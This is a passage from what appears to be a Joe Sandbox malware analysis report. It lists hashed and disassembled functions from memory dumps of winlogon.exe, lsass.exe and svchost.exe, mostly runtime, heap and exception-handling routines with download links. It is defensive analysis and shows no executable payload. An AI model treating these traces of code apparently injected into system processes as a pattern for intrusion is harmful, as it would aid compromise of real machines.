Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 59a3da0d413b928b34785c36bc61e8b583b32b9e7b9cceb6f7dadb1da7d32d4b
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 5471B336284BC341F7749E2BD8D83AAA794F7847C5F52005BDD0A53B8ADE34C684CB60

Function 000002E9917280A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E9917280CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991728162

Strings

csm, xrefs: 000002E991728149

Memory Dump Source

Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: e18fb7e9d54445409f6371f79efeb2e97b17b61baace0021c23706677771e7a7
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 5751B632356A828ADB54CF17E44CB6C33D1F745B98F16891EDA464778AD77AC8C2CB20

Function 000002E991729AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000002E991729BA7

Strings

MOC, xrefs: 000002E991729B6F
RCC, xrefs: 000002E991729B77

Memory Dump Source

Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: f8e56e85a1f2e39073d9e83f186f58b2302478e1041c027c43740ac194b6c2ad
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: C461B432505BC582E7718F16E4447EAB7A0F795B84F09461AEB9807B9ACB7CC1D1CF10

Function 000002E9917525DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002E9917526C2
StrCpyW.SHLWAPI ref: 000002E9917526D9

Strings

\\.\pipe\, xrefs: 000002E9917526CD

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: d918924d4c1c19119e08a41976e186f77b7864b5d209edd595c7a3a9f4120da3
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 4951E4262887C2C1E664DE27E45C3AA6791F395B90F46042FCE5953B9BDF3AC484CF60

Function 000002E9917825DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002E9917826C2
StrCpyW.SHLWAPI ref: 000002E9917826D9

Strings

\\.\pipe\, xrefs: 000002E9917826CD

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 5d217bf6d04f4f2066cf48567ba22e057cf07466d433004b53ba3f4c68097da3
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 6B51E6262847C241F664AE2BE4DC3AA6791F394791F56006FCE5943B9BDB39C484CF60

Function 000002E991762660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002E991762778
GetLastError.KERNEL32 ref: 000002E99176279D

Strings

U, xrefs: 000002E991762722

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 411349593ad3cc96e962f803b67d12bb301d5a2377b26e2f818162615971cb44
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: C541E332625AC186E750CF26E40879AB7A4F3487C4F81412AEE4DC7759EB3CC481CB61

Function 000002E991792660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002E991792778
GetLastError.KERNEL32 ref: 000002E99179279D

Strings

U, xrefs: 000002E991792722

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 86bbfcbc3b2bc522ed27744e2597a353c96b3a7408215917faee95bbd1c0df2c
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: EF41F532625AC186E750DF26E44879AB7A0F348785F91012BEE4D87759EB38C485CF60

Function 000002E991759178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002E9917591C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000002E9917587F7), ref: 000002E991759209

Strings

csm, xrefs: 000002E9917591F6

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 9080afa95f7a01804f2c244821efc419be84dbf608daa87a986a050390325844
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: E9110D32214B8182EB618F16F448259B7E5F788B94F594229EE8D47B65DF3CC591CB00

Function 000002E991789178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002E9917891C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000002E9917887F7), ref: 000002E991789209

Strings

csm, xrefs: 000002E9917891F6

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 62455cb78399d41422b4bacb2f9664d4c26165a867511ae89ef3ea99247706da
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 4D113D32618B8182EB618F16F448259B7E5F788B98F59426AEF8D07B65DF3CC591CB00

Function 000002E991751D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E991751D69
HeapAlloc.KERNEL32 ref: 000002E991751D77
GetProcessHeap.KERNEL32 ref: 000002E991751D9C
HeapFree.KERNEL32 ref: 000002E991751DAA

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: dc5e75dbea597644e58d0757a472dac44218e342a11f0de7a17252c2a716ed97
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 2B11C421601BC1D1EA14DB67E40C15977B0F788FC0F5A4029DE4E93726DF38C882CB00

Function 000002E991781D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E991781D69
HeapAlloc.KERNEL32 ref: 000002E991781D77
GetProcessHeap.KERNEL32 ref: 000002E991781D9C
HeapFree.KERNEL32 ref: 000002E991781DAA

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 4d2323ec3713bd9932b13aeac9ebc90c1c6d9f8db30a864723114dd424604e59
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: A411A921A41BD195EA14DF6BE80825967A0FB88FC0F5A402BDF4E53726EF38C4828710

Function 000002E991751264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E99175126A
HeapAlloc.KERNEL32 ref: 000002E991751279
GetProcessHeap.KERNEL32 ref: 000002E991751293
HeapAlloc.KERNEL32 ref: 000002E9917512A4

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: eeef85041e22312c8f4b148aac9b2b62df894d1324cff35107f827dd3875fbf4
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 83E06D31642645DBE7188F63D80C34936E1FB88F85F46C028C90947351EF7D84D9AB62

Function 000002E991781264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E99178126A
HeapAlloc.KERNEL32 ref: 000002E991781279
GetProcessHeap.KERNEL32 ref: 000002E991781293
HeapAlloc.KERNEL32 ref: 000002E9917812A4

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: ed50ef3ab0d71e7b70b719e84647f1633c4beadf3879e154f4f50509bcdd7906
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: ABE06DB16816559AE7148F63D80C34936E1FB88F06F46C02ACA0D07361EF7D84DD8B61

Function 000002E991751000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E991751006
HeapAlloc.KERNEL32 ref: 000002E991751015
GetProcessHeap.KERNEL32 ref: 000002E991751028
HeapAlloc.KERNEL32 ref: 000002E991751037

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 825a6694882a2f2e0203d72e77b5f1ea4254fdb28cd6073bd6bf03f3f975e28d
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: D0E0ED71651545DBE7189B63D80C25976A1FB88B95F458029C90947311EE3884D9AA22

Function 000002E991781000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E991781006
HeapAlloc.KERNEL32 ref: 000002E991781015
GetProcessHeap.KERNEL32 ref: 000002E991781028
HeapAlloc.KERNEL32 ref: 000002E991781037

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 5d14700ce6ee7fd00fcfe9e45fa676b48a0b3ebec7350ef0adf203bd686aa6d2
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 41E012B16915559BE7189F63DC0835976E1FB8CF16F45802ACA0D07321EE3C84DDDB21

Analysis Process: lsass.exePID: 640, Parent PID: 2384COMMON

Executed Functions

Function 00000213BDCB2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 00000213BDCB302E

Memory Dump Source

Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: 61f1d2de62c5d050c97ccebb5350ada11d9d53b3d6a2641a44b1299cf3e9cc89
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: 00915972B4599887DF50CF29D4087BDB396FB65B9CF548124DE4907788EA3ADB02C700

Non-executed Functions

Function 00000213BDCB962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000213BDCB9689

Part of subcall function 00000213BDCBA544: __GetUnwindTryBlock.LIBCMT ref: 00000213BDCBA587
Part of subcall function 00000213BDCBA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000213BDCBA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000213BDCB9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000213BDCB99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000213BDCB9ABC

Strings

csm, xrefs: 00000213BDCB9784
csm, xrefs: 00000213BDCB970A
csm, xrefs: 00000213BDCB96A3

Memory Dump Source

Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: db7b30c39e305e646b868ad5804bbc310faef19f5b9f9d70d26688d1a4736ed1
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: A4D16C32648B488AEF64DF6594883ED77A2F76978CF100115EE8957B96EF36C781C700

Function 00000213BDCB7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000213BDCB7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000213BDCB70CA
_RTC_Initialize.LIBCMT ref: 00000213BDCB70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000213BDCB711E
__scrt_release_startup_lock.LIBCMT ref: 00000213BDCB7149

Memory Dump Source

Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: d345d5324271f0d5171215dfa4b54c6fe05ce528af9bdb7db641f34e8b49a6e5
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 3E81013068D34986FE50DB65984D3D922D3ABB6B8CF389015AE48473D2FA3BCB46C740

Function 00000213BDCB9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000213BDCB9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000213BDCB9FBC

Strings

csm, xrefs: 00000213BDCB9EF6
csm, xrefs: 00000213BDCBA00E

Memory Dump Source

Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b803740eefc1816f598c49eeb7ad399cfc473af26448cda9b3f93a838d602e89
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 7B51C3322883488AEF74CF51E1483987BA2F764B9CF144115EACA87BD5EB7AC751CB05

Function 00000213BDCB80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000213BDCB80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000213BDCB8162

Strings

csm, xrefs: 00000213BDCB8149

Memory Dump Source

Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 663fbd93b9f828301bf8f4d0b442a81fa75e355fdce2156b5b3a9770e516cb1a
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 9C51B33235AA048AEF58CF15E448BAC7393EB68B9CF558125DA4647788FB7ACB41C704

Function 00000213BDCB9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000213BDCB9BA7

Strings

RCC, xrefs: 00000213BDCB9B77
MOC, xrefs: 00000213BDCB9B6F

Memory Dump Source

Source File: 0000002A.00000003.2213833034.00000213BDCB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_3_213bdcb0000_lsass.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 2ab862f2f725d330804ea44e526bf848b6203aed6b1205d3f9e1bbeff4f211bd
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 4C619132508BC882DB75DF25E4447DAB7A1F7A9B8CF044215EB9817B99EF79D290CB00

Analysis Process: svchost.exePID: 920, Parent PID: 2384COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1410
Total number of Limit Nodes:	5

Executed Functions

